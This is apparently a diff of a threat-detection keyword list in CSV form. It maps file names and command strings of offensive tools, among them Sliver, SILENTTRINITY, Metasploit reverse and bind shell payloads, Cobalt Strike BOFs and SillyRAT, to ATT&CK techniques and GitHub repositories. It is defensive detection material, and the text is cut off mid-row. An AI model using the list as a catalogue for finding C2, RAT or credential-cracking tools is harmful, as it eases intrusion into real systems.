"*SILENTTRINITY*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*silenttrinity*.dll*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*SillyRAT.git*","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/hash3liZer/SillyRAT","1","1","N/A","N/A","6","594","151","2023-06-23T18:49:43Z","2020-05-10T17:37:37Z" "*sillyrat.py*","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/hash3liZer/SillyRAT","1","1","N/A","N/A","6","594","151","2023-06-23T18:49:43Z","2020-05-10T17:37:37Z" -"*silver*/beacon.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*silver*implant.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*silver*/beacon.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*silver*implant.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*SilverPoision*","offensive_tool_keyword","Github Username","Github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/SilverPoision","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*SilverPoision/Rock-ON*","offensive_tool_keyword","Rock-ON","Rock-On is a all in one recon tool that will help your Recon process give a boost. It is mainley aimed to automate the whole process of recon and save the time that is being wasted in doing all this stuffs manually. A thorough blog will be up in sometime. Stay tuned for the Stable version with a UI","T1590 - T1210.001 - T1190 - T1213","TA0007 - TA0002 - TA0003","N/A","N/A","Information Gathering","https://github.com/SilverPoision/Rock-ON","1","1","N/A","N/A","3","288","70","2019-11-30T04:00:03Z","2019-06-10T04:42:32Z" "*SimoneLazzaris/ditty*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SimoneLazzaris/ditty","1","1","N/A","N/A","1","2","1","2022-03-10T16:15:14Z","2022-03-09T09:20:27Z" @@ -16936,22 +17119,22 @@ "*SimplyEmail.py*","offensive_tool_keyword","SimplyEmail","SimplyEmail was built arround the concept that tools should do somthing. and do that somthing well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.","T1210.001 - T1190 - T1583.001 - T1590","TA0007 - TA0002 - ","N/A","N/A","Reconnaissance","https://github.com/SimplySecurity/SimplyEmail","1","1","N/A","5","10","918","242","2023-01-12T22:20:25Z","2015-10-30T03:12:10Z" "*SimplyEmail-master*","offensive_tool_keyword","SimplyEmail","SimplyEmail was built arround the concept that tools should do somthing. and do that somthing well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.","T1210.001 - T1190 - T1583.001 - T1590","TA0007 - TA0002 - ","N/A","N/A","Reconnaissance","https://github.com/SimplySecurity/SimplyEmail","1","1","N/A","5","10","918","242","2023-01-12T22:20:25Z","2015-10-30T03:12:10Z" "*SimplySecurity/SimplyEmail*","offensive_tool_keyword","SimplyEmail","SimplyEmail was built arround the concept that tools should do somthing. and do that somthing well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.","T1210.001 - T1190 - T1583.001 - T1590","TA0007 - TA0002 - ","N/A","N/A","Reconnaissance","https://github.com/SimplySecurity/SimplyEmail","1","1","N/A","5","10","918","242","2023-01-12T22:20:25Z","2015-10-30T03:12:10Z" -"*single_reverse_tcp_shell.s*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*single_shell_bind_tcp.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*single_shell_reverse_tcp.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*single_target_exploit.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*sipdump2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*single_reverse_tcp_shell.s*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*single_shell_bind_tcp.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*single_shell_reverse_tcp.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*single_target_exploit.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*sipdump2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*sipvicious_svcrack* -u100","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*sitadel http://*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" "*sitadel https://*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" "*sitadel.py *","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" "*Sitadel-master.zip*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","1","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" -"*site-packages/wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*-Situational-Awareness-BOF*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*site-packages/wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*-Situational-Awareness-BOF*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" "*skahwah*wordsmith*","offensive_tool_keyword","wordsmith","The aim of Wordsmith is to assist with creating tailored wordlists and usernames that are primarilly based on geolocation.","T1210.001 - T1583.001 - T1583.002","TA0007 - ","N/A","N/A","Credential Access","https://github.com/skahwah/wordsmith","1","1","N/A","N/A","2","158","21","2018-05-03T13:44:01Z","2016-07-06T14:02:51Z" "*skelsec/jackdaw*","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1595 - T1590 - T1591","TA0001 - TA0002 - TA0007 - TA0008 - TA0011","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","6","532","88","2023-07-19T16:21:49Z","2019-03-27T18:36:41Z" -"*SkipPasswordAgeCheck*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"*SkipPortScan*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" +"*SkipPasswordAgeCheck*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*SkipPortScan*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" "*skymem-get-mails *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" "*SLACKAES256Handler.*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" "*slackor.db*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" @@ -16961,156 +17144,156 @@ "*sleepmask.x86.o*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*sleepmask_pivot.x64.o*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*sleepmask_pivot.x86.o*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" -"*slemire/WSPCoerce*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","202","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" +"*slemire/WSPCoerce*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","203","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" "*SlinkyCat.ps1*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","1","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*SlinkyCat-main*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","1","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" -"*Sliver C2 Session*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*sliver.service*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - 